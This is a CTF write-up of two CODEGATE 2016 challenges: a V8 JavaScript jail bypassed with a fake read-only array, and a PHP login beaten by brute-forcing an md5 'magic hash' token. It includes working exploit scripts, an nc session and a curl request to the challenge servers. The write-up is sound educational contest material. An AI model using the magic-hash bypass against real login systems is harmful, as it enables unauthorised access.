CODEGATE 2016 Quals - Writeup
i participated in CODEGATE 2016 Quals as a member of Ping-Mic.
solved:
- JS_is_not_a_jail (misc100)
helped to solve:
- Combination Pizza (web222)
JS_is_not_a_jail
First, I checked the challenge100 function.
[JavaScript Jail] let start to type on 'challenge100' V8 version 5.1.0 (candidate) d8> challenge100 function (arr) { var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6"; var check = "20150303"; if((arr === null || arr === undefined)) { print("arr is null or undefined."); return; } if(!arr.hasOwnProperty('length')) { print("length property is null or undefined."); return; } if(arr.length >= 0) { print("i think you're not geek. From now on, a GEEK Only!"); return; } if(Object.getPrototypeOf(arr) !== Array.prototype) { print("Oh.... can you give me an array?"); return; } var length = check.length; for(var i=0;i<length;i++) { arr[i] = random_value[Math.floor(Math.random() * random_value.length)]; } for(i=0;i<length;i++) { if(arr[i] !== check[i]) { print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)"); return; } } print("Yay!!"); print(flag); } d8>
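Next, I made a class MyArray. It has a length property that returns -1, and its element values (indexes 0 to 7) cannot be overwritten.
To make the values read-only, I used Object.defineProperty(). Because challenge100 is not strict-mode code, its assignments to these read-only elements fail silently instead of throwing, so the preset values are still there when it compares them.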
// Local reproduction of the jail challenge, run under node before submitting.
// The script depends on sloppy-mode (non-strict) semantics throughout: the
// implicit global `MyArray`, the value of `this` in a plain call, and writes
// to read-only properties being ignored rather than throwing.

// Prepares the object that is handed to challenge100.
// It is invoked below as a plain call (no `new`), so in non-strict code `this`
// is the global object and every assignment in the body lands on it.
MyArray = function (){
    // Satisfies an Object.getPrototypeOf(...) === Array.prototype test without
    // the object being a genuine array.
    this.__proto__ = Array.prototype;
    // Pre-load the eight characters that challenge100 compares against `check`.
    this[0] = "2";
    this[1] = "0";
    this[2] = "1";
    this[3] = "5";
    this[4] = "0";
    this[5] = "3";
    this[6] = "0";
    this[7] = "3";
    // A genuine array rejects a negative length; an ordinary object simply
    // stores -1 as an own data property named `length`.
    this.length = -1;
    return this;
};

var _arr = MyArray();
// Debug output: lists the own property names of the prepared object.
console.log(Object.getOwnPropertyNames(_arr));
// Mark indexes "0".."7" read-only. Only `writable` is changed; the stored
// values stay as set above. defineProperty returns the same object, so the
// re-assignment to _arr does not change what _arr refers to.
for(var i = 0; i <= 7; i+=1){
    _arr = Object.defineProperty(_arr, i.toString(10), { writable: false });
}
console.log(_arr.length);
// challenge100 is a function declaration, so it is hoisted and callable here.
challenge100(_arr);

// Local copy of the jail's challenge100. Compared with the version printed by
// the jail, `print` and `flag` are stubbed and a console.log(arr) is added so
// the script can be debugged outside d8.
//
// Review notes on why the checks can all be satisfied at once:
//  - the prototype comparison only inspects the prototype link; it does not
//    prove `arr` is an array (Array.isArray(arr) is the check that does);
//  - the function writes into a caller-supplied object and never confirms the
//    writes took effect; under 'use strict' the same writes would throw a
//    TypeError instead of being skipped.
function challenge100 (arr) {
    var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6";
    var check = "20150303";
    // Stand-ins for the d8 built-in print() and the real flag.
    var print = console.log;
    var flag = "test_flag{this is test}";

    if((arr === null || arr === undefined)) {
        print("arr is null or undefined.");
        return;
    }
    // Requires `length` to be an own property of the argument.
    if(!arr.hasOwnProperty('length')) {
        print("length property is null or undefined.");
        return;
    }
    // Rejects every non-negative length, which excludes all genuine arrays.
    if(arr.length >= 0) {
        print("i think you're not geek. From now on, a GEEK Only!");
        return;
    }
    if(Object.getPrototypeOf(arr) !== Array.prototype) {
        print("Oh.... can you give me an array?");
        return;
    }

    var length = check.length;
    // Attempts to overwrite indexes 0..7 with random characters. For a
    // property that is not writable, a sloppy-mode assignment is a no-op.
    for(var i=0;i<length;i++) {
        arr[i] = random_value[Math.floor(Math.random() * random_value.length)];
    }
    // Debug output, not present in the jail's version.
    console.log(arr);
    // Passes only if every index still equals the matching character of `check`.
    for(i=0;i<length;i++) {
        if(arr[i] !== check[i]) {
            print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)");
            return;
        }
    }
    print("Yay!!");
    print(flag);
}
Third, I ran this code locally to see if it works. node is a good debugging environment.
Finally, I formatted this code and pasted it into the JavaScript Jail.
// Setup code in the form that was pasted at the d8> prompt: the MyArray definition, the plain
// (no `new`) call that applies it to the sloppy-mode `this`, and the loop that marks indexes 0..7
// read-only. The console.log call is left over from the node run; d8 in the jail has no `console`
// and reports a ReferenceError for that one statement, which does not affect the rest.
MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; var _arr = MyArray(); console.log(Object.getOwnPropertyNames(_arr)); for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
$ nc 175.119.158.131 1129 [JavaScript Jail] let start to type on 'challenge100' V8 version 5.1.0 (candidate) d8> MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; var _arr = MyArray(); console.log(Object.getOwnPropertyNames(_arr)); for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });} challenge100(_arr);MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; } d8> var _arr = MyArray(); undefined d8> console.log(Object.getOwnPropertyNames(_arr)); (d8):1: ReferenceError: console is not defined console.log(Object.getOwnPropertyNames(_arr)); ^ ReferenceError: console is not defined at (d8):1:1 d8> for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });} [] d8> challenge100(_arr);challenge100(_arr); Yay!! flag is "easy xD, get a more hardest challenge!" undefined
Combination Pizza
This is _login_ck.php:
<?php
// Login check from the challenge, quoted unchanged. It looks up the user by
// name and md5(password), then gates the flag on a second md5-based token test.
// $flag is not defined here; presumably it comes from lib/for_flag.php.
include "./lib/for_flag.php";
include "./lib/lib.php";

// NOTE(review): mysql_* is the legacy ext/mysql API (deprecated in PHP 5.5,
// removed in PHP 7). Prepared statements via mysqli or PDO are the current
// way to keep request data out of the SQL text.
$user = mysql_real_escape_string($_POST['user']);
$pass = mysql_real_escape_string($_POST['pass']);
// Taken from the request as-is; used only in the md5() comparison below,
// never in the SQL string.
$token = $_POST['token'];

// NOTE(review): the password is matched as an unsalted md5() digest, which is
// not suitable for password storage; password_hash()/password_verify() is the
// standard replacement.
$que = "select user from login where user='{$user}' and pass=md5('{$pass}')";
$result = mysql_query($que);
$row = mysql_fetch_array($result);

if($row['user'] == 'Admin') {
    // NOTE(review): loose comparison of two digest strings. The expected value
    // is "0e" followed only by decimal digits, so PHP treats it as a number in
    // scientific notation (0 * 10^n = 0). Any digest of the same shape also
    // evaluates to 0 and compares equal, which makes this check far weaker
    // than matching the full digest. Use hash_equals() (or at least ===) so
    // the strings are compared byte for byte.
    if(md5("blog".$token) == '0e689047178306969035064392896674') {
        echo "good job !!!<br />FLAG : <b>".$flag."</b>";
    } else {
        echo "Incorrect Token";
    }
} else {
    echo "Incorrect ID or Password";
}
?>
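I noticed that md5("blog".$token) == '0e689047178306969035064392896674' becomes 0 == 0 (a numeric comparison) for a certain $token. PHP's loose == treats two strings of the form 0e followed by digits as numbers in scientific notation, so both sides evaluate to 0; a strict comparison (=== or hash_equals()) compares the strings themselves and does not have this problem.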
@mrtc0 found this post:
PHP: md5('240610708') == md5('QNKCDZO') | Hacker News
So i ran this php script:
<?php
// Offline search for a token whose md5("blog".$token) satisfies the same
// loose == test as the server. Because == compares "0e<digits>" strings as
// numbers, the digest does not have to equal the target; it only has to have
// the same 0e-plus-decimal-digits shape, which is why a search over short
// strings can succeed.
//
// Candidate alphabet: 47 entries, "a".."z" followed by "A".."U", with a
// lowercase "p" where "P" would be expected.
$test = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "p", "Q", "R", "S", "T", "U"];

// Five nested loops enumerate every 5-entry combination of $test. Each loop
// header re-assigns the shared $len to count($test); the value is the same
// every time, so the bounds do not change.
for($i = 0, $len = count($test); $i < $len; $i += 1){
    for($j = 0, $len = count($test); $j < $len; $j += 1){
        for($k = 0, $len = count($test); $k < $len; $k += 1){
            for($l = 0, $len = count($test); $l < $len; $l += 1){
                for($m = 0, $len = count($test); $m < $len; $m += 1){
                    // Every candidate is a newline followed by five entries.
                    $token = "\n" . $test[$i] . $test[$j] . $test[$k] . $test[$l] . $test[$m];
                    // Same loose comparison as _login_ck.php.
                    if(md5("blog".$token) == '0e689047178306969035064392896674'){
                        // Prints the URL-encoded token and its digest; the
                        // search keeps running after a match.
                        echo "\$token = " . urlencode($token) . "\n => " . md5("blog".$token) . "\n";
                    }
                }
            }
        }
    }
}
$ php ./web222_n.php $token = %0AtDMwy => 0e163908937933900237353340463810
Good!! $token = "%0AtDMwy"
gives me the flag:
curl http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login_ck.php -d "user=Admin" -d "pass=adminpw" -d 'token=%0AtDMwy' good job !!!<br />FLAG : <b>jjambbong_WEBHACKING!!@!</b